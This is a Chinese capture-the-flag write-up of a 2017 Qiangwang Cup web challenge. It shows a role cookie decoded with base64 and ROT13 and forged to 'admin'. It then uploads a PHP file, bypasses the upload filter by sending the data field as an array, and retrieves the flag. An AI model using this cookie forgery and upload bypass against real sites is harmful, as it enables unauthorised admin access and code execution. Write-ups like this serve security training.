i春秋，Web, who are you
2017第二届广东省强网杯线上赛
分值：100分
类型：Web
题目名称：who are you?
题目内容：http://106.75.72.168:2222/
我是谁，我在哪，我要做什么？
--------------------------------------
打开网页，显示：
Sorry. You have no permissions.
用 Burp Suite，Repeater，在 Request 的 Headers 中发现
Cookie: role=Zjo1OiJ0aHJmZyI7
$ python
> import base64
> base64.b64decode('Zjo1OiJ0aHJmZyI7')
b'f:5:"thrfg";'
用 ROT13 解码 thrfg 得：
$ echo -n thrfg | tr A-Za-z N-ZA-Mn-za-m; echo
guest
用 admin 代替 guest
$ echo -n admin | tr A-Za-z N-ZA-Mn-za-m; echo
nqzva
用 base64 编码：
> base64.b64encode(b'f:5:"nqzva";')
b'Zjo1OiJucXp2YSI7'
在 Request 的 Headers 中修改：
Cookie: role=Zjo1OiJucXp2YSI7
再次 Send，在 Response 中得到：
<body>
<!-- $filename = $_POST['filename']; $data = $_POST['data']; -->
Hello admin, now you can upload something you are easy to forget.
</body>
构造 POST （filename 和 date 的值无关紧要）：
filename=sun.php
data=<?php phpinfo();?>
再次 Send，得到：
No No No!
需要绕过，把上面的 data 改为 data[]，再次 Send 得到：
<body>
your file is in ./uploads/15336944b2a234eeab9022aacfac0a05sun.php
</body>
把 Request 的第1行改为
POST /uploads/15336944b2a234eeab9022aacfac0a05sun.php HTTP/1.1
再次 Send 得到：
flag{e07cd440-8eed-11e7-997d-7efc09eb6c59}
取消 Firefox 的代理设置，提交 flag，正确！

见：pub/Misc-doc/iCQ-Web-Who_are_you.pdf
